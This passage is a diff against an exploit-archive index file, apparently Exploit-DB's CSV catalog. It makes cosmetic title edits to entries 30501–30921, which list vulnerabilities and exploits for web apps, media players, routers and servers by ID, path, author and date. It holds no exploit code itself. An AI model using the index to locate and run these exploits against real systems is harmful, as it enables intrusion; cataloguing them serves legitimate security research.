+30501,platforms/php/webapps/30501.txt,"Systeme de vote pour site Web 1.0 - Multiple Remote File Include Vulnerabilities",2007-07-09,Crackers_Child,php,webapps,0 30502,platforms/java/remote/30502.txt,"Sun Java Runtime Environment 1.4.2 - Font Parsing Remote Privilege Escalation Vulnerability",2007-08-15,"John Heasman",java,remote,0 30503,platforms/linux/local/30503.txt,"BlueCat Networks Adonis 5.0.2 .8 CLI Remote Privilege Escalation Vulnerability",2007-08-16,forloop,linux,local,0 30504,platforms/php/webapps/30504.txt,"Olate Download 3.4.1 Admin.PHP Remote Authentication Bypass Vulnerability",2007-07-16,imei,php,webapps,0 @@ -27363,14 +27363,14 @@ id,file,description,date,author,platform,type,port 30526,platforms/multiple/dos/30526.txt,"Vavoom 1.24 sv_main.cpp Say Command Remote Format String",2007-08-24,"Luigi Auriemma",multiple,dos,0 30527,platforms/multiple/dos/30527.txt,"Vavoom 1.24 str.cpp VStr::Resize Function Crafted UDP Packet Remote DoS",2007-08-24,"Luigi Auriemma",multiple,dos,0 30528,platforms/multiple/dos/30528.txt,"Vavoom 1.24 p_thinker.cpp VThinker::BroadcastPrintf Function Multiple Field Remote Overflow",2007-08-24,"Luigi Auriemma",multiple,dos,0 -30529,platforms/multiple/dos/30529.txt,"Media Player Classic 6.4.9 0 - FLI File Remote Buffer Overflow Vulnerability",2007-08-24,wushi,multiple,dos,0 +30529,platforms/multiple/dos/30529.txt,"Media Player Classic 6.4.9 - - FLI File Remote Buffer Overflow Vulnerability",2007-08-24,wushi,multiple,dos,0 30530,platforms/hardware/dos/30530.pl,"Thomson SpeedTouch 2030 SIP Invite Message Remote Denial of Service Vulnerability",2007-08-27,"Humberto J. Abdelnur",hardware,dos,0 30531,platforms/php/webapps/30531.txt,"AutoIndex PHP Script 2.2.1 Index.PHP Cross-Site Scripting Vulnerability",2007-08-27,d3hydr8,php,webapps,0 30532,platforms/windows/remote/30532.pl,"Motorola Timbuktu Pro 8.6.3 .1367 Directory Traversal Vulnerability",2007-08-27,titon,windows,remote,0 30533,platforms/php/webapps/30533.txt,"Dale Mooney Calendar Events Viewevent.PHP SQL Injection Vulnerability",2007-08-27,s0cratex,php,webapps,0 30534,platforms/php/webapps/30534.txt,"PhpGedView 4.1 Login.PHP Cross Site Scripting Vulnerability",2007-08-27,"Joshua Morin",php,webapps,0 -30535,platforms/linux/remote/30535.pl,"ISC BIND 8 Remote Cache Poisoning Vulnerability (1)",2007-08-27,"Amit Klein",linux,remote,0 -30536,platforms/linux/remote/30536.pl,"ISC BIND 8 Remote Cache Poisoning Vulnerability (2)",2007-08-27,"Amit Klein",linux,remote,0 +30535,platforms/linux/remote/30535.pl,"ISC BIND 8 - Remote Cache Poisoning Vulnerability (1)",2007-08-27,"Amit Klein",linux,remote,0 +30536,platforms/linux/remote/30536.pl,"ISC BIND 8 - Remote Cache Poisoning Vulnerability (2)",2007-08-27,"Amit Klein",linux,remote,0 30537,platforms/windows/remote/30537.txt,"Microsoft MSN Messenger <= 8.0 - Video Conversation Buffer Overflow Vulnerability",2007-08-28,wushi,windows,remote,0 30538,platforms/hardware/dos/30538.pl,"Thomson SpeedTouch 2030 SIP Empty Message Remote Denial of Service Vulnerability",2007-08-28,"Humberto J. Abdelnur",hardware,dos,0 30539,platforms/php/webapps/30539.txt,"ACG News 1.0 index.php Multiple SQL Injection Vulnerabilities",2007-08-28,SmOk3,php,webapps,0 @@ -27409,10 +27409,10 @@ id,file,description,date,author,platform,type,port 30577,platforms/php/webapps/30577.txt,"SWSoft Plesk <= 8.2 - login.php3 PLESKSESSID Cookie SQL Injection",2007-09-12,"Nick I Merritt",php,webapps,0 30578,platforms/linux/dos/30578.txt,"MPlayer 1.0 AVIHeader.C Heap Based Buffer Overflow Vulnerability",2007-09-12,"Code Audit Labs",linux,dos,0 30579,platforms/linux/dos/30579.txt,"Media Player Classic 6.4.9 Malformed AVI Header Multiple Remote Vulnerabilities",2007-09-12,"Code Audit Labs",linux,dos,0 -30580,platforms/linux/dos/30580.txt,"KMPlayer 2.9.3.1214 Multiple Remote Denial of Service Vulnerabilities",2007-09-12,"Code Audit Labs",linux,dos,0 +30580,platforms/linux/dos/30580.txt,"KMPlayer 2.9.3.1214 - Multiple Remote Denial of Service Vulnerabilities",2007-09-12,"Code Audit Labs",linux,dos,0 30581,platforms/php/webapps/30581.txt,"CS-Guestbook 0.1 Login Credentials Information Disclosure Vulnerability",2007-09-12,Cr@zy_King,php,webapps,0 30582,platforms/windows/remote/30582.html,"WinSCP <= 4.0.3 URL Protocol Handler Arbitrary File Access Vulnerability",2007-09-13,Kender.Security,windows,remote,0 -30583,platforms/php/webapps/30583.txt,"Php-Stats 0.1.9.2 Tracking.PHP Cross-Site Scripting Vulnerability",2007-09-14,root@hanicker.it,php,webapps,0 +30583,platforms/php/webapps/30583.txt,"Php-Stats 0.1.9.2 - Tracking.PHP Cross-Site Scripting Vulnerability",2007-09-14,root@hanicker.it,php,webapps,0 30584,platforms/linux/dos/30584.py,"Boa 0.93.15 Administrator Password Overwrite Authentication Bypass Vulnerability",2007-09-14,"Luca Carettoni",linux,dos,0 30585,platforms/cgi/webapps/30585.txt,"Axis Communications 207W Network Camera Web Interface axis-cgi/admin/restart.cgi CSRF",2007-09-14,"Seth Fogie",cgi,webapps,0 30586,platforms/cgi/webapps/30586.txt,"Axis Communications 207W Network Camera Web Interface axis-cgi/admin/pwdgrp.cgi Multiple Parameter CSRF",2007-09-14,"Seth Fogie",cgi,webapps,0 @@ -27420,7 +27420,7 @@ id,file,description,date,author,platform,type,port 30588,platforms/php/webapps/30588.txt,"ewire Payment Client 1.60/1.70 Command Execution Vulnerability",2007-09-17,anonymous,php,webapps,0 30589,platforms/windows/remote/30589.txt,"WinImage 8.0/8.10 - File Handling Traversal Arbitrary File Overwrite",2007-09-17,j00ru//vx,windows,remote,0 30590,platforms/windows/dos/30590.txt,"WinImage 8.0/8.10 - Malformed .IMG File BPB_BytsPerSec Field DoS",2007-09-17,j00ru//vx,windows,dos,0 -30591,platforms/cgi/webapps/30591.txt,"Alcatel-Lucent OmniPCX Enterprise <= 7.1 Remote Command Execution Vulnerability",2007-09-17,"RedTeam Pentesting GmbH",cgi,webapps,0 +30591,platforms/cgi/webapps/30591.txt,"Alcatel-Lucent OmniPCX Enterprise <= 7.1 - Remote Command Execution Vulnerability",2007-09-17,"RedTeam Pentesting GmbH",cgi,webapps,0 30592,platforms/multiple/dos/30592.py,"Python 2.2 ImageOP Module Multiple Integer Overflow Vulnerabilities",2007-09-17,"Slythers Bro",multiple,dos,0 30593,platforms/windows/dos/30593.txt,"Microsoft MFC Library CFileFind::FindFile Buffer Overflow Vulnerability",2007-09-14,"Jonathan Sarba",windows,dos,0 30594,platforms/php/webapps/30594.txt,"Coppermine Photo Gallery 1.4.x mode.php referer Parameter XSS",2007-09-17,L4teral,php,webapps,0 @@ -27429,7 +27429,7 @@ id,file,description,date,author,platform,type,port 30597,platforms/cgi/webapps/30597.txt,"LevelOne WBR3404TX Broadband Router RC Parameter Cross Site Scripting Vulnerabilities",2007-09-19,azizov,cgi,webapps,0 30598,platforms/cgi/webapps/30598.txt,"WebBatch webbatch.exe URL XSS",2007-09-20,Doz,cgi,webapps,0 30599,platforms/cgi/webapps/30599.txt,"WebBatch webbatch.exe dumpinputdata Variable Remote Information Disclosure",2007-09-20,Doz,cgi,webapps,0 -30600,platforms/windows/remote/30600.html,"Xunlei Web Thunder 5.6.9.344 ActiveX Control DownURL2 Method Remote Buffer Overflow Vulnerability",2007-09-20,7jdg,windows,remote,0 +30600,platforms/windows/remote/30600.html,"Xunlei Web Thunder 5.6.9.344 - ActiveX Control DownURL2 Method Remote Buffer Overflow Vulnerability",2007-09-20,7jdg,windows,remote,0 30601,platforms/php/webapps/30601.txt,"Vigile CMS 1.8 Wiki Module Multiple Cross-Site Scripting Vulnerabilities",2007-09-20,x0kster,php,webapps,0 30602,platforms/php/webapps/30602.html,"WordPress 2.0 wp-register.php Multiple Cross-Site Scripting Vulnerabilities",2007-09-22,"Adrian Pastor",php,webapps,0 30603,platforms/php/webapps/30603.html,"Xcms 1.1/1.7 Password Parameter Arbitrary PHP Code Execution Vulnerability",2007-09-22,x0kster,php,webapps,0 @@ -27498,7 +27498,7 @@ id,file,description,date,author,platform,type,port 30666,platforms/multiple/local/30666.txt,"ACE Stream Media 2.1 - (acestream://) Format String Exploit PoC",2014-01-03,LiquidWorm,multiple,local,0 30667,platforms/hardware/webapps/30667.txt,"Technicolor TC7200 - Multiple CSRF Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0 30668,platforms/hardware/webapps/30668.txt,"Technicolor TC7200 - Multiple XSS Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0 -30669,platforms/windows/webapps/30669.txt,"DirectControlTM Version 3.1.7.0 - Multiple Vulnerabilties",2014-01-03,"mohamad ch",windows,webapps,0 +30669,platforms/windows/webapps/30669.txt,"DirectControlTM 3.1.7.0 - Multiple Vulnerabilties",2014-01-03,"mohamad ch",windows,webapps,0 30672,platforms/windows/dos/30672.txt,"Live for Speed Skin Name Buffer Overflow Vulnerability",2007-10-13,"Luigi Auriemma",windows,dos,0 30673,platforms/hardware/remote/30673.txt,"NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 Error Page Cross Site Scripting Vulnerability",2007-10-15,SkyOut,hardware,remote,0 30674,platforms/java/webapps/30674.txt,"Stringbeans Portal 3.2 Projects Script Cross-Site Scripting Vulnerability",2007-10-15,JosS,java,webapps,0 @@ -27516,9 +27516,9 @@ id,file,description,date,author,platform,type,port 30686,platforms/php/webapps/30686.txt,"SiteBar <= 3.3.8 command.php Modify User Action uid Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0 30688,platforms/hardware/webapps/30688.py,"Motorola SBG6580 Cable Modem & Wireless Router - DoS Reboot",2014-01-04,nicx0,hardware,webapps,0 30689,platforms/php/webapps/30689.php,"Taboada Macronews <= 1.0 - SQLi Exploit",2014-01-04,Jefrey,php,webapps,0 -30691,platforms/php/webapps/30691.txt,"Alacate-Lucent OmniVista 4760 Multiple Cross Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps,0 +30691,platforms/php/webapps/30691.txt,"Alacate-Lucent OmniVista 4760 - Multiple Cross Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps,0 30692,platforms/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 ierpplug.dll ActiveX Control Import Playlist Name Stack Buffer Overflow Vulnerability",2007-10-18,anonymous,windows,remote,0 -30693,platforms/php/webapps/30693.txt,"SocketKB 1.1.5 Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,"Ivan Sanchez",php,webapps,0 +30693,platforms/php/webapps/30693.txt,"SocketKB 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,"Ivan Sanchez",php,webapps,0 30694,platforms/php/webapps/30694.txt,"SocketMail 2.2.1 Lostpwd.PHP Cross-Site Scripting Vulnerability",2007-10-19,"Ivan Sanchez",php,webapps,0 30695,platforms/php/webapps/30695.txt,"rNote 0.9.7 rnote.PHP Multiple Cross Site Scripting Vulnerabilities",2007-10-19,RoMaNcYxHaCkEr,php,webapps,0 30696,platforms/asp/webapps/30696.txt,"SearchSimon Lite 1.0 Filename.ASP Cross-Site Scripting Vulnerability",2007-10-20,"Aria-Security Team",asp,webapps,0 @@ -27534,7 +27534,7 @@ id,file,description,date,author,platform,type,port 30706,platforms/asp/webapps/30706.txt,"CodeWidgets Web Based Alpha Tabbed Address Book Index.ASP SQL Injection Vulnerability",2007-10-24,"Aria-Security Team",asp,webapps,0 30707,platforms/php/webapps/30707.txt,"Phpbasic basicFramework 1.0 Includes.PHP Remote File Include Vulnerability",2007-10-24,Alucar,php,webapps,0 30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 Page.ASP SQL Injection Vulnerability",2007-10-25,joseph.giron13,asp,webapps,0 -30711,platforms/linux/remote/30711.txt,"Shttp 0.0.x Remote Directory Traversal Vulnerability",2007-10-25,"Pete Foster",linux,remote,0 +30711,platforms/linux/remote/30711.txt,"Shttp 0.0.x - Remote Directory Traversal Vulnerability",2007-10-25,"Pete Foster",linux,remote,0 30712,platforms/php/webapps/30712.txt,"Multi-Forums Directory.PHP Multiple SQL Injection Vulnerabilities",2007-10-25,KiNgOfThEwOrLd,php,webapps,0 30713,platforms/multiple/dos/30713.html,"Mozilla FireFox 2.0.8 Sidebar Bookmark Persistent Denial Of Service Vulnerability",2007-10-26,"The Hacker Webzine",multiple,dos,0 30714,platforms/unix/dos/30714.pl,"IBM Lotus Domino 7.0.2 IMAP4 LSUB Buffer Overflow Vulnerability",2007-10-27,"Manuel Santamarina Suarez",unix,dos,0 @@ -27563,13 +27563,13 @@ id,file,description,date,author,platform,type,port 30739,platforms/php/webapps/30739.txt,"JLMForo System Buscado.PHP Cross-Site Scripting Vulnerability",2007-11-05,"Jose Luis Gongora Fernandez",php,webapps,0 30740,platforms/hardware/remote/30740.html,"BT Home Hub 6.2.2.6 Login Procedure Authentication Bypass Vulnerability",2007-11-05,"David Smith",hardware,remote,0 30741,platforms/php/webapps/30741.txt,"easyGB 2.1.1 Index.PHP Local File Include Vulnerability",2007-11-05,"BorN To K!LL",php,webapps,0 -30742,platforms/multiple/remote/30742.txt,"OpenBase 10.0.x Buffer Overflow Vulnerability and Multiple Remote Command Execution Vulnerabilities",2007-11-05,"Kevin Finisterre",multiple,remote,0 +30742,platforms/multiple/remote/30742.txt,"OpenBase 10.0.x - Buffer Overflow Vulnerability and Multiple Remote Command Execution Vulnerabilities",2007-11-05,"Kevin Finisterre",multiple,remote,0 30743,platforms/asp/webapps/30743.txt,"i-Gallery 3.4 igallery.ASP Remote Information Disclosure Vulnerability",2007-11-05,hackerbinhphuoc,asp,webapps,0 30744,platforms/linux/remote/30744.txt,"MySQL <= 5.1.23 Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service Vulnerability",2007-11-05,"Joe Gallo",linux,remote,0 30745,platforms/php/webapps/30745.html,"Weblord.it MS-TopSites Unauthorized Access Vulnerability and HTML Injection Vulnerability",2007-11-06,0x90,php,webapps,0 30746,platforms/php/webapps/30746.txt,"Computer Associates SiteMinder Web Agent Smpwservices.FCC Cross Site Scripting Vulnerability",2007-11-07,"Giuseppe Gottardi",php,webapps,0 30747,platforms/asp/webapps/30747.txt,"Rapid Classified AgencyCatResult.ASP SQL Injection Vulnerability",2007-11-08,The-0utl4w,asp,webapps,0 -30748,platforms/php/webapps/30748.txt,"Xoops 2.0.17 1 Mylinks Module Brokenlink.PHP SQL injection Vulnerability",2007-11-09,root@hanicker.it,php,webapps,0 +30748,platforms/php/webapps/30748.txt,"Xoops 2.0.17 1 Mylinks Module Brokenlink.PHP SQL Injection Vulnerability",2007-11-09,root@hanicker.it,php,webapps,0 30749,platforms/windows/dos/30749.html,"Microsoft Office 2003 Web Component Memory Access Violation Denial of Service Vulnerability",2007-11-12,"Elazar Broad",windows,dos,0 30750,platforms/php/webapps/30750.pl,"PHP-Nuke Advertising Module 0.9 Modules.PHP SQL Injection Vulnerability",2007-11-12,0x90,php,webapps,0 30751,platforms/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 Login.PHP Cross Site Scripting Vulnerability",2007-11-12,"Hanno Boeck",php,webapps,0 @@ -27581,7 +27581,7 @@ id,file,description,date,author,platform,type,port 30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 sources/frame.php room Parameter XSS",2007-11-12,ShAy6oOoN,php,webapps,0 30758,platforms/php/webapps/30758.txt,"X7 Chat 2.0.4 upgradev1.php INSTALL_X7CHATVERSION Parameter XSS",2007-11-12,ShAy6oOoN,php,webapps,0 30759,platforms/cgi/webapps/30759.txt,"VTLS Web Gateway 48.1 Searchtype Parameter Cross-Site Scripting Vulnerability",2007-11-13,"Jesus Olmos Gonzalez",cgi,webapps,0 -30760,platforms/php/dos/30760.txt,"PHP 5.2.5 Multiple GetText Functions Denial Of Service Vulnerabilities",2007-11-13,"laurent gaffie",php,dos,0 +30760,platforms/php/dos/30760.txt,"PHP 5.2.5 - Multiple GetText Functions Denial Of Service Vulnerabilities",2007-11-13,"laurent gaffie",php,dos,0 30761,platforms/windows/dos/30761.html,"WebEx GPCContainer Memory Access Violation Multiple Denial of Service Vulnerabilities",2007-11-13,"Elazar Broad",windows,dos,0 30762,platforms/php/webapps/30762.txt,"WP-SlimStat 0.9.2 WordPress Plugin Cross-Site Scripting Vulnerability",2007-11-13,"Fracesco Vaj",php,webapps,0 30763,platforms/linux/dos/30763.php,"KDE Konqueror 3.5.6 Cookie Handling Denial of Service Vulnerability",2007-11-14,"laurent gaffie",linux,dos,0 @@ -27609,12 +27609,12 @@ id,file,description,date,author,platform,type,port 30788,platforms/windows/local/30788.rb,"IcoFX - Stack Buffer Overflow",2014-01-07,metasploit,windows,local,0 30789,platforms/windows/local/30789.rb,"IBM Forms Viewer - Unicode Buffer Overflow",2014-01-07,metasploit,windows,local,0 30790,platforms/php/webapps/30790.txt,"Cubic CMS - Multiple Vulnerabilities",2014-01-07,"Eugenio Delfa",php,webapps,80 -30791,platforms/multiple/dos/30791.txt,"I Hear U 0.5.6 Multiple Remote Denial Of Service Vulnerabilities",2007-11-19,"Luigi Auriemma",multiple,dos,0 +30791,platforms/multiple/dos/30791.txt,"I Hear U 0.5.6 - Multiple Remote Denial Of Service Vulnerabilities",2007-11-19,"Luigi Auriemma",multiple,dos,0 30792,platforms/php/webapps/30792.html,"Underground CMS 1.x Search.Cache.Inc.PHP Backdoor Vulnerability",2007-11-21,D4m14n,php,webapps,0 30793,platforms/asp/webapps/30793.txt,"VUNET Mass Mailer 'default.asp' SQL Injection Vulnerability",2007-11-21,"Aria-Security Team",asp,webapps,0 30794,platforms/asp/webapps/30794.txt,"VUNET Case Manager 3.4 'default.asp' SQL Injection Vulnerability",2007-11-21,The-0utl4w,asp,webapps,0 30795,platforms/cgi/webapps/30795.txt,"GWExtranet Multiple Directory Traversal Vulnerabilities",2007-11-21,joseph.giron13,cgi,webapps,0 -30796,platforms/asp/webapps/30796.txt,"E-vanced Solutions E-vents 5.0 Multiple Input Validation Vulnerabilities",2007-11-21,joseph.giron13,asp,webapps,0 +30796,platforms/asp/webapps/30796.txt,"E-vanced Solutions E-vents 5.0 - Multiple Input Validation Vulnerabilities",2007-11-21,joseph.giron13,asp,webapps,0 30797,platforms/windows/dos/30797.html,"Aurigma Image Uploader 4.x ActiveX Control Multiple Remote Stack Buffer Overflow Vulnerabilities",2007-11-22,"Elazar Broad",windows,dos,0 30798,platforms/asp/webapps/30798.txt,"NetAuctionHelp 4.1 Search.ASP SQL Injection Vulnerability",2007-11-22,"Aria-Security Team",asp,webapps,0 30799,platforms/php/webapps/30799.txt,"MySpace Scripts Poll Creator Index.PHP HTML Injection Vulnerability",2007-11-22,Doz,php,webapps,0 @@ -27658,27 +27658,27 @@ id,file,description,date,author,platform,type,port 30837,platforms/linux/dos/30837.txt,"QEMU 0.9 Translation Block Local Denial of Service Vulnerability",2007-11-30,TeLeMan,linux,dos,0 30838,platforms/multiple/remote/30838.html,"Safari 1.x/3.0.x,Firefox 1.5.0.x/2.0.x JavaScript Multiple Fields Key Filtering Vulnerability",2007-12-01,"Carl Hardwick",multiple,remote,0 30839,platforms/linux/local/30839.c,"ZABBIX 1.1.4/1.4.2 daemon_start Local Privilege Escalation Vulnerability",2007-12-03,"Bas van Schaik",linux,local,0 -30840,platforms/windows/dos/30840.txt,"SonicWALL Global VPN Client 4.0.782 Remote Format String Vulnerability",2007-12-04,"SEC Consult",windows,dos,0 +30840,platforms/windows/dos/30840.txt,"SonicWALL Global VPN Client 4.0.782 - Remote Format String Vulnerability",2007-12-04,"SEC Consult",windows,dos,0 30841,platforms/asp/webapps/30841.txt,"Absolute News Manager .NET 5.1 pages/default.aspx template Variable Remote File Access",2007-12-04,"Adrian Pastor",asp,webapps,0 30842,platforms/asp/webapps/30842.txt,"Absolute News Manager .NET 5.1 xlaabsolutenm.aspx Multiple Parameter SQL Injection",2007-12-04,"Adrian Pastor",asp,webapps,0 30843,platforms/asp/webapps/30843.txt,"Absolute News Manager .NET 5.1 xlaabsolutenm.aspx rmore Parameter XSS",2007-12-04,"Adrian Pastor",asp,webapps,0 30844,platforms/asp/webapps/30844.txt,"Absolute News Manager .NET 5.1 pages/default.aspx template Parameter XSS",2007-12-04,"Adrian Pastor",asp,webapps,0 30845,platforms/asp/webapps/30845.txt,"Absolute News Manager .NET 5.1 getpath.aspx Direct Request Error Message Information",2007-12-04,"Adrian Pastor",asp,webapps,0 30846,platforms/php/webapps/30846.txt,"phpMyChat 0.14.5 chat/deluser.php3 LIMIT Parameter XSS",2007-12-04,beenudel1986,php,webapps,0 -30847,platforms/php/webapps/30847.txt,"phpMyChat 0.14.5 chat/users_popupL.php3 Multiple Parameter XSS",2007-12-04,beenudel1986,php,webapps,0 +30847,platforms/php/webapps/30847.txt,"phpMyChat 0.14.5 chat/users_popupL.php3 - Multiple Parameter XSS",2007-12-04,beenudel1986,php,webapps,0 30848,platforms/php/webapps/30848.txt,"Joomla 1.5 RC3 com_content index.php view Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0 -30849,platforms/php/webapps/30849.txt,"Joomla 1.5 RC3 com_search Component index.php Multiple Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0 +30849,platforms/php/webapps/30849.txt,"Joomla 1.5 RC3 com_search Component - index.php Multiple Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0 30850,platforms/multiple/remote/30850.txt,"Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload Vulnerability",2007-12-05,"Luigi Auriemma",multiple,remote,0 30851,platforms/php/webapps/30851.txt,"VisualShapers ezContents 1.4.5 File Disclosure Vulnerability",2007-12-05,p4imi0,php,webapps,0 30852,platforms/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 PHP_SELF Trigger_Error Function Cross-Site Scripting Vulnerability",2007-12-06,imei,php,webapps,0 30853,platforms/php/webapps/30853.txt,"OpenNewsletter 2.5 Compose.PHP Cross-Site Scripting Vulnerability",2007-12-06,Manu,php,webapps,0 30854,platforms/php/webapps/30854.sh,"wwwstats 3.21 Clickstats.PHP Multiple HTML Injection Vulnerabilities",2007-12-15,"Jesus Olmos Gonzalez",php,webapps,0 -30855,platforms/asp/webapps/30855.txt,"WebDoc 3.0 Multiple SQL Injection Vulnerabilities",2007-12-07,Chrysalid,asp,webapps,0 +30855,platforms/asp/webapps/30855.txt,"WebDoc 3.0 - Multiple SQL Injection Vulnerabilities",2007-12-07,Chrysalid,asp,webapps,0 30856,platforms/multiple/dos/30856.txt,"Easy File Sharing Web Server 1.3x Directory Traversal and Multiple Information Disclosure Vulnerabilities",2007-12-07,"Luigi Auriemma",multiple,dos,0 30857,platforms/php/webapps/30857.txt,"webSPELL 4.1.2 usergallery.php galleryID Parameter XSS",2007-12-10,Brainhead,php,webapps,0 30858,platforms/php/webapps/30858.txt,"webSPELL 4.1.2 calendar.php Multiple Parameter XSS",2007-12-10,Brainhead,php,webapps,0 30859,platforms/php/webapps/30859.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 Access Validation And Input Validation Vulnerabilities",2007-12-10,"Tomas Kuliavas",php,webapps,0 -30860,platforms/asp/webapps/30860.txt,"bttlxe Forum 2.0 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2007-12-10,Mormoroth,asp,webapps,0 +30860,platforms/asp/webapps/30860.txt,"bttlxe Forum 2.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2007-12-10,Mormoroth,asp,webapps,0 30861,platforms/php/webapps/30861.txt,"E-Xoops 1.0.5/1.0.8 mylinks/ratelink.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 30862,platforms/php/webapps/30862.txt,"E-Xoops 1.0.5/1.0.8 adresses/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 30863,platforms/php/webapps/30863.txt,"E-Xoops 1.0.5/1.0.8 mydownloads/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 @@ -27702,13 +27702,13 @@ id,file,description,date,author,platform,type,port 30887,platforms/php/webapps/30887.txt,"phPay 2.2.1 Windows Installations Local File Include Vulnerability",2007-12-15,"Michael Brooks",php,webapps,0 30888,platforms/php/webapps/30888.txt,"phpRPG 0.8 /tmp Directory PHPSESSID Cookie Session Hijacking",2007-12-15,"Michael Brooks",php,webapps,0 30889,platforms/php/webapps/30889.txt,"WordPress 2.3.1 Unauthorized Post Access Vulnerability",2007-12-15,"Michael Brooks",php,webapps,0 -30890,platforms/php/webapps/30890.txt,"Black Sheep Web Software Form Tools 1.5 Multiple Remote File Include Vulnerabilities",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0 -30891,platforms/php/webapps/30891.txt,"Flyspray 0.9.9 Multiple Cross-Site Scripting Vulnerabilities",2007-12-09,"KAWASHIMA Takahiro",php,webapps,0 -30892,platforms/php/webapps/30892.txt,"Neuron News 1.0 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2007-12-17,"hadihadi & black.shadowes",php,webapps,0 +30890,platforms/php/webapps/30890.txt,"Black Sheep Web Software Form Tools 1.5 - Multiple Remote File Include Vulnerabilities",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0 +30891,platforms/php/webapps/30891.txt,"Flyspray 0.9.9 - Multiple Cross-Site Scripting Vulnerabilities",2007-12-09,"KAWASHIMA Takahiro",php,webapps,0 +30892,platforms/php/webapps/30892.txt,"Neuron News 1.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2007-12-17,"hadihadi & black.shadowes",php,webapps,0 30893,platforms/php/webapps/30893.txt,"PHP Security Framework Multiple Input Validation Vulnerabilities",2007-12-17,DarkFig,php,webapps,0 30894,platforms/linux/dos/30894.txt,"PeerCast 0.12 HandshakeHTTP Multiple Buffer Overflow Vulnerabilities",2007-12-17,"Luigi Auriemma",linux,dos,0 30895,platforms/linux/remote/30895.pl,"Perl Net::DNS 0.48/0.59/0.60 DNS Response Remote Denial of Service Vulnerability",2007-12-17,beSTORM,linux,remote,0 -30896,platforms/multiple/dos/30896.txt,"Appian Business Process Management Suite 5.6 Remote Denial of Service Vulnerability",2007-12-17,"Chris Castaldo",multiple,dos,0 +30896,platforms/multiple/dos/30896.txt,"Appian Business Process Management Suite 5.6 - Remote Denial of Service Vulnerability",2007-12-17,"Chris Castaldo",multiple,dos,0 30897,platforms/windows/remote/30897.html,"iMesh 7 'IMWebControl' ActiveX Control Code Execution Vulnerability",2007-12-17,rgod,windows,remote,0 30898,platforms/linux/dos/30898.pl,"Common UNIX Printing System 1.2/1.3 SNMP 'asn1_get_string()' Remote Buffer Overflow Vulnerability",2007-11-06,wei_wang,linux,dos,0 30899,platforms/php/webapps/30899.txt,"Mambo 4.6.2 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-12-18,"Beenu Arora",php,webapps,0 @@ -27717,8 +27717,8 @@ id,file,description,date,author,platform,type,port 30902,platforms/linux/dos/30902.c,"Linux Kernel 2.6.22 IPv6 Hop-By-Hop Header Remote Denial of Service Vulnerability",2007-12-19,"Clemens Kurtenbach",linux,dos,0 30903,platforms/multiple/dos/30903.c,"id3lib ID3 Tags Buffer Overflow Vulnerability",2007-12-19,"Luigi Auriemma",multiple,dos,0 30905,platforms/multiple/remote/30905.txt,"Adobe Flash Player 8.0.34.0/9.0.x main.swf baseurl Parameter asfunction: Protocol Handler XSS",2007-12-18,"Rich Cannings",multiple,remote,0 -30906,platforms/multiple/dos/30906.c,"ProWizard 4 PC 1.62 Multiple Remote Stack Based Buffer Overflow Vulnerabilities",2007-12-19,"Luigi Auriemma",multiple,dos,0 -30907,platforms/linux/remote/30907.txt,"Adobe Flash Player 7.0.x/8.0.x/9.0.x ActiveX Control 'navigateToURL' API Cross Domain Scripting Vulnerability",2007-12-18,"Adam Barth",linux,remote,0 +30906,platforms/multiple/dos/30906.c,"ProWizard 4 PC 1.62 - Multiple Remote Stack Based Buffer Overflow Vulnerabilities",2007-12-19,"Luigi Auriemma",multiple,dos,0 +30907,platforms/linux/remote/30907.txt,"Adobe Flash Player 7.0.x/8.0.x/9.0.x - ActiveX Control 'navigateToURL' API Cross Domain Scripting Vulnerability",2007-12-18,"Adam Barth",linux,remote,0 30908,platforms/windows/remote/30908.txt,"SoapUI 4.6.3 - Remote Code Execution",2014-01-14,"Barak Tawily",windows,remote,0 30909,platforms/php/webapps/30909.html,"Auto Classifieds Script 2.0 - Add Admin CSRF Vulnerability",2014-01-14,"HackXBack ",php,webapps,80 30910,platforms/php/webapps/30910.txt,"PHPJabbers Job Listing Script - Multiple Vulnerabilities",2014-01-14,"HackXBack ",php,webapps,80 @@ -27732,14 +27732,14 @@ id,file,description,date,author,platform,type,port 30918,platforms/php/webapps/30918.txt,"iDevSpot iSupport 1.8 'index.php' Local File Include Vulnerability",2007-12-20,JuMp-Er,php,webapps,0 30919,platforms/cgi/webapps/30919.txt,"SiteScape Forum 'dispatch.cgi' Tcl Command Injection Vulnerability",2007-12-20,niekt0,cgi,webapps,0 30920,platforms/windows/remote/30920.html,"HP eSupportDiagnostics 1.0.11 'hpediag.dll' ActiveX Control Multiple Information Disclosure Vulnerabilities",2007-12-20,"Elazar Broad",windows,remote,0 -30921,platforms/php/webapps/30921.txt,"MRBS 1.2.x 'view_entry.php' SQL Injection Vulnerability",2007-12-21,root@hanicker.it,php,webapps,0 +30921,platforms/php/webapps/30921.txt,"MRBS 1.2.x - 'view_entry.php' SQL Injection 